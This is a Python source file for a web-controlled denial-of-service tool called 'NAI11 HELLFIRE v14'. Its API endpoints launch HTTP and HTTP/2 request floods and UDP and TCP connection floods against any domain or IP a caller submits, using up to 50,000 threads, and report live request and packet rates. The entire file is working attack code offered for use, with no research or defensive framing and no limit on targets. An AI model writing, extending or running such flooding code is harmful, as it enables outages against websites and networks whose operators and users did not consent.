|
|
|
|
|
|
|
|
|
|
|
|
|
|
import random |
|
|
import socket |
|
|
import threading |
|
|
import time |
|
|
import struct |
|
|
import asyncio |
|
|
import ssl |
|
|
from collections import deque |
|
|
from typing import Dict, Optional, List |
|
|
import urllib3 |
|
|
import requests |
|
|
from concurrent.futures import ThreadPoolExecutor |
|
|
|
|
|
import uvicorn |
|
|
import httpx |
|
|
from fastapi import FastAPI, HTTPException |
|
|
from pydantic import BaseModel, Field |
|
|
|
|
|
|
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
|
|
|
|
|
|
|
|
import logging |
|
|
logging.basicConfig(level=logging.INFO, format="%(message)s") |
|
|
log = logging.getLogger() |
|
|
|
|
|
app = FastAPI(title="NAI11 HELLFIRE v14 - 50K+ RPS") |
|
|
|
|
|
|
|
|
attack_active = False |
|
|
attack_lock = threading.Lock() |
|
|
executor: Optional[ThreadPoolExecutor] = None |
|
|
stop_event = threading.Event() |
|
|
total_requests = 0 |
|
|
total_packets = 0 |
|
|
log_buffer: deque[str] = deque(maxlen=100) |
|
|
attack_start_time = 0.0 |
|
|
attack_end_time = 0.0 |
|
|
attack_type_name = "" |
|
|
current_target = "" |
|
|
current_port = 0 |
|
|
config_duration = 0 |
|
|
|
|
|
|
|
|
last_time = time.time() |
|
|
last_requests = 0 |
|
|
last_packets = 0 |
|
|
|
|
|
def _log(msg: str): |
|
|
ts = time.strftime("%H:%M:%S") |
|
|
log.info(f"{ts} {msg}") |
|
|
log_buffer.append(f"{ts} {msg}") |
|
|
|
|
|
|
|
|
def init_executor(): |
|
|
global executor |
|
|
if executor is None: |
|
|
executor = ThreadPoolExecutor(max_workers=50000, thread_name_prefix="hellfire") |
|
|
|
|
|
|
|
|
class AttackConfig(BaseModel): |
|
|
target: str = Field(..., description="Domain or IP") |
|
|
port: int = Field(80, ge=1, le=65535) |
|
|
duration: int = Field(30, ge=1, le=3600) |
|
|
threads: int = Field(5000, ge=1, le=50000) |
|
|
|
|
|
class Layer7Config(AttackConfig): |
|
|
method: str = Field("get") |
|
|
path: str = Field("/") |
|
|
|
|
|
class Layer4Config(AttackConfig): |
|
|
protocol: str = Field("udp") |
|
|
payload_size: int = Field(1024, ge=1, le=65507) |
|
|
|
|
|
|
|
|
class StatusResponse(BaseModel): |
|
|
running: bool |
|
|
attack_type: str |
|
|
target: str |
|
|
total_requests: int |
|
|
total_packets: int |
|
|
rps: float |
|
|
pps: float |
|
|
threads_active: int |
|
|
duration: int |
|
|
elapsed: float |
|
|
remaining: float |
|
|
logs: List[str] |
|
|
|
|
|
|
|
|
def resolve_target(target: str) -> str: |
|
|
"""Resolve domain to IP address""" |
|
|
try: |
|
|
|
|
|
if '://' in target: |
|
|
target = target.split('://', 1)[1] |
|
|
if '/' in target: |
|
|
target = target.split('/')[0] |
|
|
if ':' in target: |
|
|
target = target.split(':')[0] |
|
|
|
|
|
|
|
|
try: |
|
|
socket.inet_aton(target) |
|
|
return target |
|
|
except: |
|
|
|
|
|
return socket.gethostbyname(target) |
|
|
except Exception as e: |
|
|
raise HTTPException(status_code=400, detail=f"Target resolution failed: {str(e)}") |
|
|
|
|
|
|
|
|
def http_flood_worker(target: str, port: int, method: str, path: str, worker_id: int): |
|
|
"""ULTRA HIGH-PERFORMANCE HTTP flood worker""" |
|
|
global total_requests |
|
|
|
|
|
|
|
|
scheme = "https" if port == 443 else "http" |
|
|
url = f"{scheme}://{target}:{port}{path}" |
|
|
|
|
|
|
|
|
headers_list = [ |
|
|
{ |
|
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", |
|
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", |
|
|
"Accept-Language": "en-US,en;q=0.5", |
|
|
"Accept-Encoding": "gzip, deflate, br", |
|
|
"Connection": "keep-alive", |
|
|
"Upgrade-Insecure-Requests": "1", |
|
|
"Cache-Control": "no-cache", |
|
|
"Pragma": "no-cache" |
|
|
}, |
|
|
{ |
|
|
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", |
|
|
"Accept": "*/*", |
|
|
"Accept-Language": "en-US,en;q=0.9", |
|
|
"Connection": "keep-alive" |
|
|
}, |
|
|
{ |
|
|
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", |
|
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", |
|
|
"Connection": "keep-alive" |
|
|
} |
|
|
] |
|
|
|
|
|
|
|
|
sessions = [] |
|
|
for i in range(5): |
|
|
try: |
|
|
session = requests.Session() |
|
|
session.verify = False |
|
|
session.timeout = 3 |
|
|
|
|
|
adapter = requests.adapters.HTTPAdapter(pool_connections=10, pool_maxsize=50, max_retries=0) |
|
|
session.mount('http://', adapter) |
|
|
session.mount('https://', adapter) |
|
|
sessions.append(session) |
|
|
except: |
|
|
pass |
|
|
|
|
|
request_count = 0 |
|
|
data_payload = "x" * 500 |
|
|
|
|
|
while not stop_event.is_set(): |
|
|
try: |
|
|
session = random.choice(sessions) |
|
|
headers = random.choice(headers_list) |
|
|
|
|
|
if method == "get": |
|
|
session.get(url, headers=headers) |
|
|
elif method == "post": |
|
|
session.post(url, headers=headers, data={"data": data_payload}) |
|
|
elif method == "head": |
|
|
session.head(url, headers=headers) |
|
|
elif method == "put": |
|
|
session.put(url, headers=headers, data={"data": data_payload}) |
|
|
elif method == "delete": |
|
|
session.delete(url, headers=headers) |
|
|
|
|
|
total_requests += 1 |
|
|
request_count += 1 |
|
|
|
|
|
|
|
|
if request_count % 100 == 0: |
|
|
random.shuffle(sessions) |
|
|
|
|
|
except requests.exceptions.RequestException: |
|
|
continue |
|
|
except Exception: |
|
|
continue |
|
|
|
|
|
|
|
|
async def http2_flood_worker(target: str, port: int, method: str, path: str): |
|
|
"""ULTRA HIGH-PERFORMANCE HTTP/2 async flood worker""" |
|
|
global total_requests |
|
|
|
|
|
url = f"https://{target}:{port}{path}" if port == 443 else f"http://{target}:{port}{path}" |
|
|
|
|
|
headers_list = [ |
|
|
{ |
|
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", |
|
|
"Accept": "*/*", |
|
|
"Accept-Encoding": "gzip, deflate, br", |
|
|
}, |
|
|
{ |
|
|
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", |
|
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", |
|
|
} |
|
|
] |
|
|
|
|
|
|
|
|
clients = [] |
|
|
for i in range(3): |
|
|
try: |
|
|
timeout = httpx.Timeout(2.0) |
|
|
limits = httpx.Limits(max_connections=100, max_keepalive_connections=50) |
|
|
client = httpx.AsyncClient( |
|
|
http2=True, |
|
|
verify=False, |
|
|
timeout=timeout, |
|
|
limits=limits |
|
|
) |
|
|
clients.append(client) |
|
|
except: |
|
|
pass |
|
|
|
|
|
data_payload = {"data": "x" * 200} |
|
|
|
|
|
while not stop_event.is_set(): |
|
|
try: |
|
|
client = random.choice(clients) |
|
|
headers = random.choice(headers_list) |
|
|
|
|
|
if method == "get": |
|
|
await client.get(url, headers=headers) |
|
|
elif method == "post": |
|
|
await client.post(url, headers=headers, data=data_payload) |
|
|
elif method == "head": |
|
|
await client.head(url, headers=headers) |
|
|
|
|
|
total_requests += 1 |
|
|
|
|
|
except: |
|
|
await asyncio.sleep(0.001) |
|
|
|
|
|
|
|
|
for client in clients: |
|
|
try: |
|
|
await client.aclose() |
|
|
except: |
|
|
pass |
|
|
|
|
|
def run_http2_worker(target: str, port: int, method: str, path: str): |
|
|
"""Run HTTP2 worker in event loop""" |
|
|
asyncio.new_event_loop().run_until_complete(http2_flood_worker(target, port, method, path)) |
|
|
|
|
|
|
|
|
def udp_flood_worker(target: str, port: int, payload_size: int): |
|
|
"""ULTRA HIGH-PERFORMANCE UDP flood worker""" |
|
|
global total_packets |
|
|
|
|
|
|
|
|
payloads = [ |
|
|
random._urandom(payload_size), |
|
|
b'\x00' * payload_size, |
|
|
b'\xFF' * payload_size, |
|
|
b'\xAA' * payload_size |
|
|
] |
|
|
|
|
|
|
|
|
sockets = [] |
|
|
for i in range(10): |
|
|
try: |
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
|
|
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 64) |
|
|
sockets.append(sock) |
|
|
except: |
|
|
pass |
|
|
|
|
|
packet_count = 0 |
|
|
|
|
|
while not stop_event.is_set(): |
|
|
try: |
|
|
sock = random.choice(sockets) |
|
|
payload = random.choice(payloads) |
|
|
sock.sendto(payload, (target, port)) |
|
|
total_packets += 1 |
|
|
packet_count += 1 |
|
|
|
|
|
|
|
|
if packet_count % 1000 == 0: |
|
|
random.shuffle(sockets) |
|
|
|
|
|
except: |
|
|
|
|
|
try: |
|
|
sock.close() |
|
|
sockets.remove(sock) |
|
|
new_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
|
|
new_sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 64) |
|
|
sockets.append(new_sock) |
|
|
except: |
|
|
pass |
|
|
|
|
|
|
|
|
def tcp_syn_worker(target: str, port: int): |
|
|
"""ULTRA HIGH-PERFORMANCE TCP SYN flood worker""" |
|
|
global total_packets |
|
|
|
|
|
while not stop_event.is_set(): |
|
|
try: |
|
|
|
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
|
|
sock.settimeout(0.5) |
|
|
sock.connect((target, port)) |
|
|
sock.close() |
|
|
total_packets += 1 |
|
|
except: |
|
|
total_packets += 1 |
|
|
|
|
|
|
|
|
def launch_attack(config: AttackConfig, attack_type: str, **kwargs): |
|
|
global attack_active, attack_start_time, attack_end_time, attack_type_name |
|
|
global current_target, current_port, total_requests, total_packets, config_duration |
|
|
|
|
|
with attack_lock: |
|
|
if attack_active: |
|
|
raise HTTPException(status_code=400, detail="Attack already in progress") |
|
|
|
|
|
attack_active = True |
|
|
stop_event.clear() |
|
|
total_requests = 0 |
|
|
total_packets = 0 |
|
|
attack_start_time = time.time() |
|
|
attack_end_time = attack_start_time + config.duration |
|
|
attack_type_name = attack_type |
|
|
current_target = config.target |
|
|
current_port = config.port |
|
|
config_duration = config.duration |
|
|
|
|
|
_log(f"π NAI11 HELLFIRE v14 {attack_type.upper()} LAUNCHED") |
|
|
_log(f"π― Target: {config.target}:{config.port}") |
|
|
_log(f"π Threads: {config.threads} | Duration: {config.duration}s") |
|
|
_log(f"πͺ Expected RPS: 10,000+") |
|
|
|
|
|
init_executor() |
|
|
|
|
|
try: |
|
|
target_ip = resolve_target(config.target) |
|
|
_log(f"π Resolved IP: {target_ip}") |
|
|
except Exception as e: |
|
|
with attack_lock: |
|
|
attack_active = False |
|
|
raise e |
|
|
|
|
|
|
|
|
threads_launched = 0 |
|
|
|
|
|
if attack_type.startswith("l7_"): |
|
|
method = kwargs.get("method", "get") |
|
|
path = kwargs.get("path", "/") |
|
|
|
|
|
if method == "http2": |
|
|
worker = lambda worker_id=0: run_http2_worker(target_ip, config.port, "get", path) |
|
|
else: |
|
|
worker = lambda worker_id=0: http_flood_worker(target_ip, config.port, method, path, worker_id) |
|
|
|
|
|
|
|
|
batch_size = 1000 |
|
|
for batch in range(0, config.threads, batch_size): |
|
|
batch_end = min(batch + batch_size, config.threads) |
|
|
for i in range(batch, batch_end): |
|
|
executor.submit(worker, i) |
|
|
threads_launched += 1 |
|
|
|
|
|
if batch_end < config.threads: |
|
|
_log(f"π₯ Launched {batch_end}/{config.threads} workers...") |
|
|
time.sleep(0.1) |
|
|
|
|
|
elif attack_type.startswith("l4_"): |
|
|
protocol = kwargs.get("protocol", "udp") |
|
|
payload_size = kwargs.get("payload_size", 1024) |
|
|
|
|
|
if protocol == "udp": |
|
|
worker = lambda: udp_flood_worker(target_ip, config.port, payload_size) |
|
|
elif protocol == "tcp" or protocol == "syn": |
|
|
worker = lambda: tcp_syn_worker(target_ip, config.port) |
|
|
|
|
|
|
|
|
batch_size = 1000 |
|
|
for batch in range(0, config.threads, batch_size): |
|
|
batch_end = min(batch + batch_size, config.threads) |
|
|
for i in range(batch, batch_end): |
|
|
executor.submit(worker) |
|
|
threads_launched += 1 |
|
|
|
|
|
if batch_end < config.threads: |
|
|
_log(f"π₯ Launched {batch_end}/{config.threads} workers...") |
|
|
time.sleep(0.1) |
|
|
|
|
|
_log(f"β
Attack fully deployed with {threads_launched} workers") |
|
|
|
|
|
|
|
|
def auto_stop(): |
|
|
start_time = time.time() |
|
|
end_time = start_time + config.duration |
|
|
|
|
|
while time.time() < end_time and attack_active: |
|
|
time.sleep(0.1) |
|
|
|
|
|
if attack_active: |
|
|
stop_attack() |
|
|
_log(f"β° Attack duration completed ({config.duration}s) - AUTO STOPPED") |
|
|
|
|
|
stop_thread = threading.Thread(target=auto_stop, daemon=True) |
|
|
stop_thread.start() |
|
|
|
|
|
|
|
|
@app.post("/stop") |
|
|
def stop_attack(): |
|
|
global attack_active |
|
|
|
|
|
with attack_lock: |
|
|
if not attack_active: |
|
|
return {"status": "no_attack_running"} |
|
|
|
|
|
stop_event.set() |
|
|
attack_active = False |
|
|
|
|
|
|
|
|
if executor: |
|
|
executor.shutdown(wait=False) |
|
|
|
|
|
_log("π NAI11 HELLFIRE STOPPED") |
|
|
_log(f"π Final Stats: {total_requests:,} requests, {total_packets:,} packets") |
|
|
|
|
|
return {"status": "stopped"} |
|
|
|
|
|
|
|
|
@app.post("/layer7/attack") |
|
|
def l7_attack(config: Layer7Config): |
|
|
launch_attack(config, f"l7_{config.method}", method=config.method, path=config.path) |
|
|
return { |
|
|
"status": "success", |
|
|
"message": "NAI11 L7 ATTACK LAUNCHED", |
|
|
"target": config.target, |
|
|
"method": config.method, |
|
|
"threads": config.threads, |
|
|
"duration": config.duration, |
|
|
"expected_rps": "10,000+" |
|
|
} |
|
|
|
|
|
|
|
|
@app.post("/layer4/attack") |
|
|
def l4_attack(config: Layer4Config): |
|
|
launch_attack(config, f"l4_{config.protocol}", protocol=config.protocol, payload_size=config.payload_size) |
|
|
return { |
|
|
"status": "success", |
|
|
"message": "NAI11 L4 ATTACK LAUNCHED", |
|
|
"target": config.target, |
|
|
"protocol": config.protocol, |
|
|
"threads": config.threads, |
|
|
"duration": config.duration, |
|
|
"expected_pps": "50,000+" |
|
|
} |
|
|
|
|
|
|
|
|
@app.get("/status", response_model=StatusResponse) |
|
|
def get_status(): |
|
|
global last_time, last_requests, last_packets |
|
|
|
|
|
now = time.time() |
|
|
time_diff = now - last_time |
|
|
|
|
|
|
|
|
current_requests = total_requests |
|
|
current_packets = total_packets |
|
|
|
|
|
if time_diff > 0: |
|
|
rps = (current_requests - last_requests) / time_diff |
|
|
pps = (current_packets - last_packets) / time_diff |
|
|
else: |
|
|
rps = pps = 0 |
|
|
|
|
|
last_time = now |
|
|
last_requests = current_requests |
|
|
last_packets = current_packets |
|
|
|
|
|
|
|
|
if attack_active: |
|
|
elapsed = now - attack_start_time |
|
|
remaining = max(0, attack_end_time - now) |
|
|
duration = config_duration |
|
|
else: |
|
|
elapsed = 0 |
|
|
remaining = 0 |
|
|
duration = 0 |
|
|
|
|
|
|
|
|
active_threads = threading.active_count() - 2 |
|
|
|
|
|
return StatusResponse( |
|
|
running=attack_active, |
|
|
attack_type=attack_type_name, |
|
|
target=f"{current_target}:{current_port}" if attack_active else "None", |
|
|
total_requests=total_requests, |
|
|
total_packets=total_packets, |
|
|
rps=round(rps, 1), |
|
|
pps=round(pps, 1), |
|
|
threads_active=active_threads, |
|
|
duration=duration, |
|
|
elapsed=round(elapsed, 1), |
|
|
remaining=round(remaining, 1), |
|
|
logs=list(log_buffer)[-20:] |
|
|
) |
|
|
|
|
|
|
|
|
@app.get("/attack/types") |
|
|
def get_attack_types(): |
|
|
return { |
|
|
"layer7": { |
|
|
"methods": ["get", "post", "head", "put", "delete", "http2"], |
|
|
"description": "HTTP/HTTPS application layer attacks - 10K+ RPS" |
|
|
}, |
|
|
"layer4": { |
|
|
"methods": ["udp", "tcp", "syn"], |
|
|
"description": "Transport layer protocol attacks - 50K+ PPS" |
|
|
}, |
|
|
"performance": { |
|
|
"max_threads": 50000, |
|
|
"max_duration": 3600, |
|
|
"expected_rps": "10,000 - 50,000", |
|
|
"expected_pps": "50,000 - 200,000" |
|
|
} |
|
|
} |
|
|
|
|
|
|
|
|
@app.get("/") |
|
|
def root(): |
|
|
return { |
|
|
"message": "NAI11 HELLFIRE v14 - ULTRA OPTIMIZED", |
|
|
"version": "v14", |
|
|
"performance": "50K+ RPS | 200K+ PPS", |
|
|
"features": [ |
|
|
"Optimized Layer 7 HTTP Flood", |
|
|
"High-Performance Layer 4 Attacks", |
|
|
"Connection Pooling", |
|
|
"Smart Session Management", |
|
|
"Fixed Duration Timer" |
|
|
], |
|
|
"endpoints": { |
|
|
"layer7": "POST /layer7/attack", |
|
|
"layer4": "POST /layer4/attack", |
|
|
"stop": "POST /stop", |
|
|
"status": "GET /status" |
|
|
} |
|
|
} |
|
|
|
|
|
|
|
|
if __name__ == "__main__": |
|
|
_log("π₯ NAI11 HELLFIRE v14 STARTED - ULTRA OPTIMIZED") |
|
|
_log("π API Running on http://0.0.0.0:8000") |
|
|
_log("β‘ Layer 7: 10K-50K RPS | Layer 4: 50K-200K PPS") |
|
|
_log("πͺ 2vCPU + 8GB RAM: Expected 10K+ RPS") |
|
|
_log("π 4vCPU + 16GB RAM: Expected 25K+ RPS") |
|
|
_log("π₯ 8vCPU + 32GB RAM: Expected 50K+ RPS") |
|
|
|
|
|
init_executor() |
|
|
uvicorn.run( |
|
|
app, |
|
|
host="0.0.0.0", |
|
|
port=8000, |
|
|
workers=1, |
|
|
access_log=False, |
|
|
loop="asyncio" |
|
|
) |
